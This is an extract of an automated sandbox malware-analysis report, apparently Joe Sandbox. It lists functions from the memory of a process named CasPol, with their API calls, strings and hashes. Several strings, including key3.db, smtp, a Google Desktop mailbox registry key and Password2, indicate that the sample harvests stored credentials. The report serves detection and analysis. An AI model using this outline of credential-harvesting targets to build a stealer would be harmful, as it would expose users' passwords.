                                                                                                                                                                                    • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2775283111-0
                                                                                                                                                                                    • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                    • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                                                                                                    Function 00405F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(0000000A), ref: 00405F6C
                                                                                                                                                                                      • Part of subcall function 004015F4: GetDlgItem.USER32(?,?), ref: 00401604
                                                                                                                                                                                      • Part of subcall function 004015F4: GetClientRect.USER32(?,?), ref: 00401616
                                                                                                                                                                                      • Part of subcall function 004015F4: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401680
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040602B
                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00406036
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                                                                                    • Opcode ID: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                    • Instruction ID: a7623898fd9bb087a7334f25a668ee6c33d9336bc772a6b4061b4b4824447eab
                                                                                                                                                                                    • Opcode Fuzzy Hash: 46c13f54b0de6b7af3bf11703fc8189c954e9ba913f197146dd0d24af27c410d
                                                                                                                                                                                    • Instruction Fuzzy Hash: C7317070640259FFEB229B52CC89DAF3E7CEBC5B98F10402DF401792A1CA794F11E669
                                                                                                                                                                                    Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                                                                                                    • API String ID: 885266447-2471937615
                                                                                                                                                                                    • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                    • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                                                                                                    Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406B11
                                                                                                                                                                                      • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT(00000000,00406B00,?,00406C55,00000000,?,00000000,?), ref: 00407909
                                                                                                                                                                                      • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                                                                                                                                                                                      • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID: Ul@$key3.db
                                                                                                                                                                                    • API String ID: 1968906679-1563549157
                                                                                                                                                                                    • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                    • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                                                                                                                                                                                    Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E134
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi$_mbscpy
                                                                                                                                                                                    • String ID: smtp
                                                                                                                                                                                    • API String ID: 2625860049-60245459
                                                                                                                                                                                    • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                    • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                    • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                    • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                    Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                    • memset.MSVCRT ref: 00408258
                                                                                                                                                                                      • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Close$EnumOpenmemset
                                                                                                                                                                                    • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                    • API String ID: 2255314230-2212045309
                                                                                                                                                                                    • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                    • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                    Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                      • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FocusMessagePostmemset
                                                                                                                                                                                    • String ID: S_@$l
                                                                                                                                                                                    • API String ID: 3436799508-4018740455
                                                                                                                                                                                    • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                    • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                    Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                    • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                    • API String ID: 408644273-3424043681
                                                                                                                                                                                    • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                    • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                                                    • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                                                    Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                    • String ID: C^@$X$ini
                                                                                                                                                                                    • API String ID: 714388716-917056472
                                                                                                                                                                                    • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                    • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                    • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                    Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                      • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 3492281209-168460110
                                                                                                                                                                                    • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                    • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                    Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName_strcmpimemset
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 275601554-2167791130
                                                                                                                                                                                    • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                    • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                    • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                    • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                    Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscat
                                                                                                                                                                                    • String ID: 3CD
                                                                                                                                                                                    • API String ID: 3951308622-1938365332
                                                                                                                                                                                    • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                    • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                    Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscat$_mbscpy
                                                                                                                                                                                    • String ID: Password2
                                                                                                                                                                                    • API String ID: 2600922555-1856559283
                                                                                                                                                                                    • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                    • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                    Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                    • API String ID: 2574300362-543337301
                                                                                                                                                                                    • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                    • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                    Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: rows deleted
                                                                                                                                                                                    • API String ID: 2221118986-571615504
                                                                                                                                                                                    • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                    • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                    Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                    • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                    • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                    Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                    • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                    Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                    • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                    • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                    • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                    • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                    • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                    Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                    • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                    • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                    • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                    Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                    • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                    Memory Dump Source
